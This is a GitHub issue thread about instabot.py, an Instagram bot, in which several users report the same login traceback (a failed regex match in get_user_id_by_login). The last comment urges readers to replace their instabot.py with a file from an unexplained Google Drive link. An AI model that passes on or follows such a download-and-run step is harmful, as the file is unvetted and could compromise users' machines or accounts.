### ISSUE TITLE
Traceback (most recent call last) not working. 

### ISSUE THREAD

**Issue by MiroBas** [instabot-py/instabot.py#1541]
Hi, I've seen the other issues with this message(Traceback ("most recent call last):") and I tried everything and it didn't work. Maybe it's because it's a littlebit different than the others:

Traceback (most recent call last):
  File "example.py", line 50, in <module>
    'follow', 'follower', 'gain', '.id', '_id', 'bags'
  File "C:\Users\josch\Desktop\instabot.py-master1\instabot.py-master\src\instabot.py", line 234, in __init__
    self.login()
  File "C:\Users\josch\Desktop\instabot.py-master1\instabot.py-master\src\instabot.py", line 303, in login
    self.user_id = ui.get_user_id_by_login(self.user_login)
  File "C:\Users\josch\Desktop\instabot.py-master1\instabot.py-master\src\userinfo.py", line 42, in get_user_id_by_login
    json_info = json.loads(re.search('{"activity.+show_app', info.text, re.DOTALL).group(0)+'":""}')
AttributeError: 'NoneType' object has no attribute 'group'

Please help! And if there is the same issu with the completely same message, please tell me. thanks

**Comment by MarkoGroenendijk** [comment]
Hi sadly i dont have a solution. for me it worked untill today. I logged out and this evening i wanted to rum the script again and i get an error almost the same as you:

Traceback (most recent call last):
  File "example2.py", line 52, in <module>
    unfollow_whitelist=['example_user_1', 'example_user_2'])
  File "C:\Users\7010\desktop\instabot\instabot.py-master\src\instabot.py", line 232, in __init__
    self.login()
  File "C:\Users\7010\desktop\instabot\instabot.py-master\src\instabot.py", line 314, in login
    self.user_id = ui.get_user_id_by_login(self.user_login)
  File "C:\Users\7010\desktop\instabot\instabot.py-master\src\userinfo.py", line 42, in get_user_id_by_login
    json_info = json.loads(re.search('{"activity.+show_app', info.text, re.DOTALL).group(0)+'":""}')
AttributeError: 'NoneType' object has no attribute 'group'

I am hoping that we will find a solution.

**Comment by KarimHamdy6** [comment]
same issue I got it for about a week ago.

Traceback (most recent call last):
  File "C:\Users\Karim\Downloads\instabot.py-master\example.py", line 52, in <module>
    unfollow_whitelist=['example_user_1', 'example_user_2'])
  File "C:\Users\Karim\Downloads\instabot.py-master\src\instabot.py", line 232, in __init__
    self.login()
  File "C:\Users\Karim\Downloads\instabot.py-master\src\instabot.py", line 301, in login
    self.user_id = ui.get_user_id_by_login(self.user_login)
  File "C:\Users\Karim\Downloads\instabot.py-master\src\userinfo.py", line 42, in get_user_id_by_login
    json_info = json.loads(re.search('{"activity.+show_app', info.text, re.DOTALL).group(0)+'":""}')

**Comment by JULIANCRACK** [comment]
Go to the src file and replace the instanbot.py with the python to download via the link below, it worked for me : 
DL the file here  : https://drive.google.com/file/d/1hUVP-FUXVAzOFSVT5XVSBGicGpA_AFUK/view
